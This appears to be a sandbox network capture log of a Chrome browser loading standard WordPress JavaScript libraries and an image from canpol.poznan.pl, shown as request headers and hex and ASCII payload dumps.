                                                            Accept-Ranges: bytes
                                                            Content-Length: 906
                                                            Vary: Accept-Encoding
                                                            Content-Type: text/javascript
                                                            2025-01-15 10:08:04 UTC906INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 29 7b 65 2e 77 70 3d 65 2e 77 70 7c 7c 7b 7d 2c 65 2e 77 70 2e 6d 65 64 69 61 65 6c 65 6d 65 6e 74 3d 6e 65 77 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 7b 7d 3b 72 65 74 75 72 6e 7b 69 6e 69 74 69 61 6c 69 7a 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 28 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 5f 77 70 6d 65 6a 73 53 65 74 74 69 6e 67 73 3f 6e 2e 65 78 74 65 6e 64 28 21 30 2c 7b 7d 2c 5f 77 70 6d 65 6a 73 53 65 74 74 69 6e 67 73 29 3a 65 29 2e 63 6c 61 73 73 50 72 65 66 69 78 3d 22 6d 65 6a 73 2d 22 2c 65 2e 73 75 63 63 65 73 73 3d 65 2e 73 75 63 63 65 73 73 7c 7c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 2c 74 3b 65 2e 72 65 6e 64 65 72 65 72 4e 61 6d 65 26 26 2d 31 21 3d
                                                            Data Ascii: !function(e,n){e.wp=e.wp||{},e.wp.mediaelement=new function(){var e={};return{initialize:function(){(e="undefined"!=typeof _wpmejsSettings?n.extend(!0,{},_wpmejsSettings):e).classPrefix="mejs-",e.success=e.success||function(e){var n,t;e.rendererName&&-1!=


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            90192.168.2.1649807178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:08:04 UTC591OUTGET /wp-includes/js/wp-emoji-release.min.js?ver=5.8 HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: */*
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: script
                                                            Referer: https://canpol.poznan.pl/en/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:08:04 UTC286INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:08:04 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 12:13:50 GMT
                                                            ETag: "4705-620a92ca06b2f"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 18181
                                                            Vary: Accept-Encoding
                                                            Content-Type: text/javascript
                                                            2025-01-15 10:08:04 UTC7906INData Raw: 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 2f 2f 20 53 6f 75 72 63 65 3a 20 77 70 2d 69 6e 63 6c 75 64 65 73 2f 6a 73 2f 74 77 65 6d 6f 6a 69 2e 6d 69 6e 2e 6a 73 0a 76 61 72 20 74 77 65 6d 6f 6a 69 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 66 3d 7b 62 61 73 65 3a 22 68 74 74 70 73 3a 2f 2f 74 77 65 6d 6f 6a 69 2e 6d 61 78 63 64 6e 2e 63 6f 6d 2f 76 2f 31 33 2e 31 2e 30 2f 22 2c 65 78 74 3a 22 2e 70 6e 67 22 2c 73 69 7a 65 3a 22 37 32 78 37 32 22 2c 63 6c 61 73 73 4e 61 6d 65 3a 22 65 6d 6f 6a 69 22 2c 63 6f 6e 76 65 72 74 3a 7b 66 72 6f 6d 43 6f 64 65 50 6f 69 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 64 29 7b 64 3d 22 73 74 72 69 6e 67 22 3d 3d 74 79 70
                                                            Data Ascii: /*! This file is auto-generated */// Source: wp-includes/js/twemoji.min.jsvar twemoji=function(){"use strict";var f={base:"https://twemoji.maxcdn.com/v/13.1.0/",ext:".png",size:"72x72",className:"emoji",convert:{fromCodePoint:function(d){d="string"==typ
                                                            2025-01-15 10:08:04 UTC8000INData Raw: 63 5b 5c 75 64 66 66 62 2d 5c 75 64 66 66 66 5d 7c 5c 75 64 38 33 64 5c 75 64 63 38 66 5c 75 64 38 33 63 5b 5c 75 64 66 66 62 2d 5c 75 64 66 66 66 5d 7c 5c 75 64 38 33 64 5c 75 64 63 39 31 5c 75 64 38 33 63 5b 5c 75 64 66 66 62 2d 5c 75 64 66 66 66 5d 7c 5c 75 64 38 33 64 5b 5c 75 64 63 36 62 2d 5c 75 64 63 36 64 5c 75 64 63 38 66 5c 75 64 63 39 31 5d 29 7c 28 3f 3a 5c 75 64 38 33 64 5b 5c 75 64 63 36 38 5c 75 64 63 36 39 5d 7c 5c 75 64 38 33 65 5c 75 64 64 64 31 29 28 3f 3a 5c 75 64 38 33 63 5b 5c 75 64 66 66 62 2d 5c 75 64 66 66 66 5d 29 3f 5c 75 32 30 30 64 28 3f 3a 5c 75 32 36 39 35 5c 75 66 65 30 66 7c 5c 75 32 36 39 36 5c 75 66 65 30 66 7c 5c 75 32 37 30 38 5c 75 66 65 30 66 7c 5c 75 64 38 33 63 5b 5c 75 64 66 33 65 5c 75 64 66 37 33 5c 75 64 66 37
                                                            Data Ascii: c[\udffb-\udfff]|\ud83d\udc8f\ud83c[\udffb-\udfff]|\ud83d\udc91\ud83c[\udffb-\udfff]|\ud83d[\udc6b-\udc6d\udc8f\udc91])|(?:\ud83d[\udc68\udc69]|\ud83e\uddd1)(?:\ud83c[\udffb-\udfff])?\u200d(?:\u2695\ufe0f|\u2696\ufe0f|\u2708\ufe0f|\ud83c[\udf3e\udf73\udf7
                                                            2025-01-15 10:08:04 UTC2275INData Raw: 2e 6c 65 6e 67 74 68 29 26 26 31 3d 3d 3d 74 2e 6c 65 6e 67 74 68 26 26 33 3d 3d 3d 65 5b 30 5d 2e 6e 6f 64 65 54 79 70 65 26 26 22 49 4d 47 22 3d 3d 3d 74 5b 30 5d 2e 6e 6f 64 65 4e 61 6d 65 26 26 65 5b 30 5d 2e 64 61 74 61 3d 3d 3d 74 5b 30 5d 2e 61 6c 74 26 26 22 6c 6f 61 64 2d 66 61 69 6c 65 64 22 3d 3d 3d 74 5b 30 5d 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 65 72 72 6f 72 22 29 29 72 65 74 75 72 6e 3b 66 6f 72 28 3b 6e 2d 2d 3b 29 7b 69 66 28 33 3d 3d 3d 28 61 3d 65 5b 6e 5d 29 2e 6e 6f 64 65 54 79 70 65 29 7b 69 66 28 21 61 2e 70 61 72 65 6e 74 4e 6f 64 65 29 63 6f 6e 74 69 6e 75 65 3b 69 66 28 6f 29 66 6f 72 28 3b 61 2e 6e 65 78 74 53 69 62 6c 69 6e 67 26 26 33 3d 3d 3d 61 2e 6e 65 78 74 53 69 62 6c 69 6e 67 2e 6e 6f 64 65 54 79
                                                            Data Ascii: .length)&&1===t.length&&3===e[0].nodeType&&"IMG"===t[0].nodeName&&e[0].data===t[0].alt&&"load-failed"===t[0].getAttribute("data-error"))return;for(;n--;){if(3===(a=e[n]).nodeType){if(!a.parentNode)continue;if(o)for(;a.nextSibling&&3===a.nextSibling.nodeTy


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            91192.168.2.1649808178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:08:04 UTC408OUTGET /wp-includes/js/comment-reply.min.js?ver=5.8 HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: */*
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:08:04 UTC284INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:08:04 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 12:13:47 GMT
                                                            ETag: "ba8-620a92c766d68"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 2984
                                                            Vary: Accept-Encoding
                                                            Content-Type: text/javascript
                                                            2025-01-15 10:08:04 UTC2984INData Raw: 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 77 69 6e 64 6f 77 2e 61 64 64 43 6f 6d 6d 65 6e 74 3d 66 75 6e 63 74 69 6f 6e 28 76 29 7b 76 61 72 20 49 2c 43 2c 68 2c 45 3d 76 2e 64 6f 63 75 6d 65 6e 74 2c 62 3d 7b 63 6f 6d 6d 65 6e 74 52 65 70 6c 79 43 6c 61 73 73 3a 22 63 6f 6d 6d 65 6e 74 2d 72 65 70 6c 79 2d 6c 69 6e 6b 22 2c 63 6f 6d 6d 65 6e 74 52 65 70 6c 79 54 69 74 6c 65 49 64 3a 22 72 65 70 6c 79 2d 74 69 74 6c 65 22 2c 63 61 6e 63 65 6c 52 65 70 6c 79 49 64 3a 22 63 61 6e 63 65 6c 2d 63 6f 6d 6d 65 6e 74 2d 72 65 70 6c 79 2d 6c 69 6e 6b 22 2c 63 6f 6d 6d 65 6e 74 46 6f 72 6d 49 64 3a 22 63 6f 6d 6d 65 6e 74 66 6f 72 6d 22 2c 74 65 6d 70 6f 72 61 72 79 46 6f 72 6d 49 64 3a 22 77 70 2d 74
                                                            Data Ascii: /*! This file is auto-generated */window.addComment=function(v){var I,C,h,E=v.document,b={commentReplyClass:"comment-reply-link",commentReplyTitleId:"reply-title",cancelReplyId:"cancel-comment-reply-link",commentFormId:"commentform",temporaryFormId:"wp-t


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            92192.168.2.1649809178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:08:04 UTC643OUTGET /wp-content/uploads/2015/07/Disney3.png HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: image
                                                            Referer: https://canpol.poznan.pl/en/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:08:04 UTC256INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:08:04 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 11:40:19 GMT
                                                            ETag: "1ad4-620a8b4c5663a"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 6868
                                                            Content-Type: image/png
                                                            2025-01-15 10:08:04 UTC6868INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 50 00 00 00 fe 08 06 00 00 00 f5 6b 3b f2 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 0a 4f 69 43 43 50 50 68 6f 74 6f 73 68 6f 70 20 49 43 43 20 70 72 6f 66 69 6c 65 00 00 78 da 9d 53 67 54 53 e9 16 3d f7 de f4 42 4b 88 80 94 4b 6f 52 15 08 20 52 42 8b 80 14 91 26 2a 21 09 10 4a 88 21 a1 d9 15 51 c1 11 45 45 04 1b c8 a0 88 03 8e 8e 80 8c 15 51 2c 0c 8a 0a d8 07 e4 21 a2 8e 83 a3 88 8a ca fb e1 7b a3 6b d6 bc f7 e6 cd fe b5 d7 3e e7 ac f3 9d b3 cf 07 c0 08 0c 96 48 33 51 35 80 0c a9 42 1e 11 e0 83 c7 c4 c6 e1 e4 2e 40 81 0a 24 70 00 10 08 b3 64 21 73 fd 23 01 00 f8 7e 3c 3c 2b 22 c0 07 be 00 01 78 d3 0b 08 00 c0 4d 9b c0 30 1c 87 ff 0f ea 42 99 5c 01 80 84 01 c0 74 91 38 4b
                                                            Data Ascii: PNGIHDRPk;pHYs.#.#x?vOiCCPPhotoshop ICC profilexSgTS=BKKoR RB&*!J!QEEQ,!{k>H3Q5B.@$pd!s#~<<+"xM0B\t8K


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            93192.168.2.1649810178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:08:04 UTC420OUTGET /wp-content/themes/salient/js/tweenmax.min.js?ver=1.18.0 HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: */*
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:08:04 UTC288INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:08:04 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 11:55:04 GMT
                                                            ETag: "1ad39-620a8e97d84e6"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 109881
                                                            Vary: Accept-Encoding
                                                            Content-Type: text/javascript
                                                            2025-01-15 10:08:04 UTC7904INData Raw: 2f 2a 21 0a 20 2a 20 56 45 52 53 49 4f 4e 3a 20 31 2e 31 38 2e 30 0a 20 2a 20 44 41 54 45 3a 20 32 30 31 35 2d 30 39 2d 30 35 0a 20 2a 20 55 50 44 41 54 45 53 20 41 4e 44 20 44 4f 43 53 20 41 54 3a 20 68 74 74 70 3a 2f 2f 67 72 65 65 6e 73 6f 63 6b 2e 63 6f 6d 0a 20 2a 20 0a 20 2a 20 49 6e 63 6c 75 64 65 73 20 61 6c 6c 20 6f 66 20 74 68 65 20 66 6f 6c 6c 6f 77 69 6e 67 3a 20 54 77 65 65 6e 4c 69 74 65 2c 20 54 77 65 65 6e 4d 61 78 2c 20 54 69 6d 65 6c 69 6e 65 4c 69 74 65 2c 20 54 69 6d 65 6c 69 6e 65 4d 61 78 2c 20 45 61 73 65 50 61 63 6b 2c 20 43 53 53 50 6c 75 67 69 6e 2c 20 52 6f 75 6e 64 50 72 6f 70 73 50 6c 75 67 69 6e 2c 20 42 65 7a 69 65 72 50 6c 75 67 69 6e 2c 20 41 74 74 72 50 6c 75 67 69 6e 2c 20 44 69 72 65 63 74 69 6f 6e 61 6c 52 6f 74 61 74
                                                            Data Ascii: /*! * VERSION: 1.18.0 * DATE: 2015-09-05 * UPDATES AND DOCS AT: http://greensock.com * * Includes all of the following: TweenLite, TweenMax, TimelineLite, TimelineMax, EasePack, CSSPlugin, RoundPropsPlugin, BezierPlugin, AttrPlugin, DirectionalRotat
                                                            2025-01-15 10:08:05 UTC8000INData Raw: 6e 2c 61 2c 6f 3d 66 28 72 29 2c 6c 3d 69 26 26 73 26 26 72 2c 68 3d 6f 2e 6c 65 6e 67 74 68 3b 2d 2d 68 3e 2d 31 3b 29 61 3d 6f 5b 68 5d 2c 28 6c 7c 7c 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 65 7c 7c 28 6e 3d 61 2e 74 61 72 67 65 74 3d 3d 3d 61 2e 76 61 72 73 2e 6f 6e 43 6f 6d 70 6c 65 74 65 29 26 26 73 7c 7c 69 26 26 21 6e 29 26 26 61 2e 70 61 75 73 65 64 28 74 29 7d 3b 72 65 74 75 72 6e 20 6e 2e 70 61 75 73 65 41 6c 6c 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 69 29 7b 70 28 21 30 2c 74 2c 65 2c 69 29 7d 2c 6e 2e 72 65 73 75 6d 65 41 6c 6c 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 69 29 7b 70 28 21 31 2c 74 2c 65 2c 69 29 7d 2c 6e 2e 67 6c 6f 62 61 6c 54 69 6d 65 53 63 61 6c 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 73 3d 74 2e 5f 72 6f 6f
                                                            Data Ascii: n,a,o=f(r),l=i&&s&&r,h=o.length;--h>-1;)a=o[h],(l||a instanceof e||(n=a.target===a.vars.onComplete)&&s||i&&!n)&&a.paused(t)};return n.pauseAll=function(t,e,i){p(!0,t,e,i)},n.resumeAll=function(t,e,i){p(!1,t,e,i)},n.globalTimeScale=function(e){var s=t._roo
                                                            2025-01-15 10:08:05 UTC8000INData Raw: 69 6d 65 3d 3d 3d 72 29 26 26 74 68 69 73 2e 5f 72 61 77 50 72 65 76 54 69 6d 65 21 3d 3d 74 26 26 74 68 69 73 2e 5f 66 69 72 73 74 26 26 28 6c 3d 21 30 2c 74 68 69 73 2e 5f 72 61 77 50 72 65 76 54 69 6d 65 3e 72 26 26 28 6f 3d 22 6f 6e 52 65 76 65 72 73 65 43 6f 6d 70 6c 65 74 65 22 29 29 29 2c 74 68 69 73 2e 5f 72 61 77 50 72 65 76 54 69 6d 65 3d 74 68 69 73 2e 5f 64 75 72 61 74 69 6f 6e 7c 7c 21 65 7c 7c 74 7c 7c 74 68 69 73 2e 5f 72 61 77 50 72 65 76 54 69 6d 65 3d 3d 3d 74 3f 74 3a 72 2c 74 3d 63 2b 31 65 2d 34 3b 65 6c 73 65 20 69 66 28 31 65 2d 37 3e 74 29 69 66 28 74 68 69 73 2e 5f 74 6f 74 61 6c 54 69 6d 65 3d 74 68 69 73 2e 5f 74 69 6d 65 3d 30 2c 28 30 21 3d 3d 66 7c 7c 30 3d 3d 3d 74 68 69 73 2e 5f 64 75 72 61 74 69 6f 6e 26 26 74 68 69 73 2e
                                                            Data Ascii: ime===r)&&this._rawPrevTime!==t&&this._first&&(l=!0,this._rawPrevTime>r&&(o="onReverseComplete"))),this._rawPrevTime=this._duration||!e||t||this._rawPrevTime===t?t:r,t=c+1e-4;else if(1e-7>t)if(this._totalTime=this._time=0,(0!==f||0===this._duration&&this.
                                                            2025-01-15 10:08:05 UTC8000INData Raw: 7c 7c 74 68 69 73 2e 5f 72 61 77 50 72 65 76 54 69 6d 65 3d 3d 3d 74 3f 74 3a 72 2c 30 3d 3d 3d 74 26 26 6e 29 66 6f 72 28 73 3d 74 68 69 73 2e 5f 66 69 72 73 74 3b 73 26 26 30 3d 3d 3d 73 2e 5f 73 74 61 72 74 54 69 6d 65 3b 29 73 2e 5f 64 75 72 61 74 69 6f 6e 7c 7c 28 6e 3d 21 31 29 2c 73 3d 73 2e 5f 6e 65 78 74 3b 74 3d 30 2c 74 68 69 73 2e 5f 69 6e 69 74 74 65 64 7c 7c 28 5f 3d 21 30 29 7d 65 6c 73 65 20 69 66 28 30 3d 3d 3d 70 26 26 30 3e 79 26 26 28 5f 3d 21 30 29 2c 74 68 69 73 2e 5f 74 69 6d 65 3d 74 68 69 73 2e 5f 72 61 77 50 72 65 76 54 69 6d 65 3d 74 2c 74 68 69 73 2e 5f 6c 6f 63 6b 65 64 7c 7c 28 74 68 69 73 2e 5f 74 6f 74 61 6c 54 69 6d 65 3d 74 2c 30 21 3d 3d 74 68 69 73 2e 5f 72 65 70 65 61 74 26 26 28 75 3d 70 2b 74 68 69 73 2e 5f 72 65 70
                                                            Data Ascii: ||this._rawPrevTime===t?t:r,0===t&&n)for(s=this._first;s&&0===s._startTime;)s._duration||(n=!1),s=s._next;t=0,this._initted||(_=!0)}else if(0===p&&0>y&&(_=!0),this._time=this._rawPrevTime=t,this._locked||(this._totalTime=t,0!==this._repeat&&(u=p+this._rep
                                                            2025-01-15 10:08:05 UTC8000INData Raw: 73 7d 2c 70 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 65 3d 65 3e 3e 30 7c 7c 36 3b 76 61 72 20 69 2c 73 2c 72 2c 6e 2c 61 3d 5b 5d 2c 6f 3d 5b 5d 2c 6c 3d 30 2c 68 3d 30 2c 5f 3d 65 2d 31 2c 75 3d 5b 5d 2c 63 3d 5b 5d 3b 66 6f 72 28 69 20 69 6e 20 74 29 66 28 74 5b 69 5d 2c 61 2c 65 29 3b 66 6f 72 28 72 3d 61 2e 6c 65 6e 67 74 68 2c 73 3d 30 3b 72 3e 73 3b 73 2b 2b 29 6c 2b 3d 4d 61 74 68 2e 73 71 72 74 28 61 5b 73 5d 29 2c 6e 3d 73 25 65 2c 63 5b 6e 5d 3d 6c 2c 6e 3d 3d 3d 5f 26 26 28 68 2b 3d 6c 2c 6e 3d 73 2f 65 3e 3e 30 2c 75 5b 6e 5d 3d 63 2c 6f 5b 6e 5d 3d 68 2c 6c 3d 30 2c 63 3d 5b 5d 29 3b 72 65 74 75 72 6e 7b 6c 65 6e 67 74 68 3a 68 2c 6c 65 6e 67 74 68 73 3a 6f 2c 73 65 67 6d 65 6e 74 73 3a 75 7d 7d 2c 6d 3d 5f 67 73 53 63 6f 70 65 2e 5f 67
                                                            Data Ascii: s},p=function(t,e){e=e>>0||6;var i,s,r,n,a=[],o=[],l=0,h=0,_=e-1,u=[],c=[];for(i in t)f(t[i],a,e);for(r=a.length,s=0;r>s;s++)l+=Math.sqrt(a[s]),n=s%e,c[n]=l,n===_&&(h+=l,n=s/e>>0,u[n]=c,o[n]=h,l=0,c=[]);return{length:h,lengths:o,segments:u}},m=_gsScope._g
                                                            2025-01-15 10:08:05 UTC8000INData Raw: 74 22 3d 3d 3d 65 3f 22 4c 65 66 74 22 3a 22 54 6f 70 22 2c 72 3d 51 28 74 2c 22 6d 61 72 67 69 6e 22 2b 73 2c 69 29 3b 72 65 74 75 72 6e 20 74 5b 22 6f 66 66 73 65 74 22 2b 73 5d 2d 28 24 28 74 2c 65 2c 70 61 72 73 65 46 6c 6f 61 74 28 72 29 2c 72 2e 72 65 70 6c 61 63 65 28 54 2c 22 22 29 29 7c 7c 30 29 7d 2c 4b 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 76 61 72 20 69 2c 73 2c 72 2c 6e 3d 7b 7d 3b 69 66 28 65 3d 65 7c 7c 5a 28 74 2c 6e 75 6c 6c 29 29 69 66 28 69 3d 65 2e 6c 65 6e 67 74 68 29 66 6f 72 28 3b 2d 2d 69 3e 2d 31 3b 29 72 3d 65 5b 69 5d 2c 28 2d 31 3d 3d 3d 72 2e 69 6e 64 65 78 4f 66 28 22 2d 74 72 61 6e 73 66 6f 72 6d 22 29 7c 7c 6b 65 3d 3d 3d 72 29 26 26 28 6e 5b 72 2e 72 65 70 6c 61 63 65 28 53 2c 4f 29 5d 3d 65 2e 67 65 74 50 72 6f 70
                                                            Data Ascii: t"===e?"Left":"Top",r=Q(t,"margin"+s,i);return t["offset"+s]-($(t,e,parseFloat(r),r.replace(T,""))||0)},K=function(t,e){var i,s,r,n={};if(e=e||Z(t,null))if(i=e.length)for(;--i>-1;)r=e[i],(-1===r.indexOf("-transform")||ke===r)&&(n[r.replace(S,O)]=e.getProp
                                                            2025-01-15 10:08:05 UTC8000INData Raw: 73 70 61 72 65 6e 74 22 2c 61 2e 65 3d 61 2e 65 2e 73 70 6c 69 74 28 52 5b 75 5d 29 2e 6a 6f 69 6e 28 22 74 72 61 6e 73 70 61 72 65 6e 74 22 29 29 3a 28 59 7c 7c 28 78 3d 21 31 29 2c 6b 3f 61 2e 61 70 70 65 6e 64 58 74 72 61 28 78 3f 22 68 73 6c 61 28 22 3a 22 68 73 6c 28 22 2c 70 5b 30 5d 2c 72 65 28 6d 5b 30 5d 2c 70 5b 30 5d 29 2c 22 2c 22 2c 21 31 2c 21 30 29 2e 61 70 70 65 6e 64 58 74 72 61 28 22 22 2c 70 5b 31 5d 2c 72 65 28 6d 5b 31 5d 2c 70 5b 31 5d 29 2c 22 25 2c 22 2c 21 31 29 2e 61 70 70 65 6e 64 58 74 72 61 28 22 22 2c 70 5b 32 5d 2c 72 65 28 6d 5b 32 5d 2c 70 5b 32 5d 29 2c 78 3f 22 25 2c 22 3a 22 25 22 2b 50 2c 21 31 29 3a 61 2e 61 70 70 65 6e 64 58 74 72 61 28 78 3f 22 72 67 62 61 28 22 3a 22 72 67 62 28 22 2c 70 5b 30 5d 2c 6d 5b 30 5d 2d
                                                            Data Ascii: sparent",a.e=a.e.split(R[u]).join("transparent")):(Y||(x=!1),k?a.appendXtra(x?"hsla(":"hsl(",p[0],re(m[0],p[0]),",",!1,!0).appendXtra("",p[1],re(m[1],p[1]),"%,",!1).appendXtra("",p[2],re(m[2],p[2]),x?"%,":"%"+P,!1):a.appendXtra(x?"rgba(":"rgb(",p[0],m[0]-
                                                            2025-01-15 10:08:05 UTC8000INData Raw: 2c 5f 3d 28 30 7c 4d 61 74 68 2e 63 6f 73 28 6e 29 2a 73 2e 73 63 61 6c 65 59 2a 61 29 2f 61 2c 75 3d 74 68 69 73 2e 74 2e 73 74 79 6c 65 2c 63 3d 74 68 69 73 2e 74 2e 63 75 72 72 65 6e 74 53 74 79 6c 65 3b 69 66 28 63 29 7b 69 3d 6c 2c 6c 3d 2d 68 2c 68 3d 2d 69 2c 65 3d 63 2e 66 69 6c 74 65 72 2c 75 2e 66 69 6c 74 65 72 3d 22 22 3b 76 61 72 20 66 2c 70 2c 64 3d 74 68 69 73 2e 74 2e 6f 66 66 73 65 74 57 69 64 74 68 2c 67 3d 74 68 69 73 2e 74 2e 6f 66 66 73 65 74 48 65 69 67 68 74 2c 76 3d 22 61 62 73 6f 6c 75 74 65 22 21 3d 3d 63 2e 70 6f 73 69 74 69 6f 6e 2c 79 3d 22 70 72 6f 67 69 64 3a 44 58 49 6d 61 67 65 54 72 61 6e 73 66 6f 72 6d 2e 4d 69 63 72 6f 73 6f 66 74 2e 4d 61 74 72 69 78 28 4d 31 31 3d 22 2b 6f 2b 22 2c 20 4d 31 32 3d 22 2b 6c 2b 22 2c 20
                                                            Data Ascii: ,_=(0|Math.cos(n)*s.scaleY*a)/a,u=this.t.style,c=this.t.currentStyle;if(c){i=l,l=-h,h=-i,e=c.filter,u.filter="";var f,p,d=this.t.offsetWidth,g=this.t.offsetHeight,v="absolute"!==c.position,y="progid:DXImageTransform.Microsoft.Matrix(M11="+o+", M12="+l+",
                                                            2025-01-15 10:08:05 UTC8000INData Raw: 63 2e 73 75 62 73 74 72 28 28 70 2b 22 22 29 2e 6c 65 6e 67 74 68 2d 28 30 3e 70 3f 31 3a 30 29 29 7c 7c 22 22 29 3a 28 70 3d 70 61 72 73 65 46 6c 6f 61 74 28 63 29 2c 67 3d 63 2e 73 75 62 73 74 72 28 28 70 2b 22 22 29 2e 6c 65 6e 67 74 68 29 29 2c 22 22 3d 3d 3d 67 26 26 28 67 3d 73 5b 69 5d 7c 7c 76 29 2c 67 21 3d 3d 76 26 26 28 54 3d 24 28 74 2c 22 62 6f 72 64 65 72 4c 65 66 74 22 2c 66 2c 76 29 2c 78 3d 24 28 74 2c 22 62 6f 72 64 65 72 54 6f 70 22 2c 66 2c 76 29 2c 22 25 22 3d 3d 3d 67 3f 28 75 3d 31 30 30 2a 28 54 2f 6d 29 2b 22 25 22 2c 5f 3d 31 30 30 2a 28 78 2f 64 29 2b 22 25 22 29 3a 22 65 6d 22 3d 3d 3d 67 3f 28 77 3d 24 28 74 2c 22 62 6f 72 64 65 72 4c 65 66 74 22 2c 31 2c 22 65 6d 22 29 2c 75 3d 54 2f 77 2b 22 65 6d 22 2c 5f 3d 78 2f 77 2b 22
                                                            Data Ascii: c.substr((p+"").length-(0>p?1:0))||""):(p=parseFloat(c),g=c.substr((p+"").length)),""===g&&(g=s[i]||v),g!==v&&(T=$(t,"borderLeft",f,v),x=$(t,"borderTop",f,v),"%"===g?(u=100*(T/m)+"%",_=100*(x/d)+"%"):"em"===g?(w=$(t,"borderLeft",1,"em"),u=T/w+"em",_=x/w+"
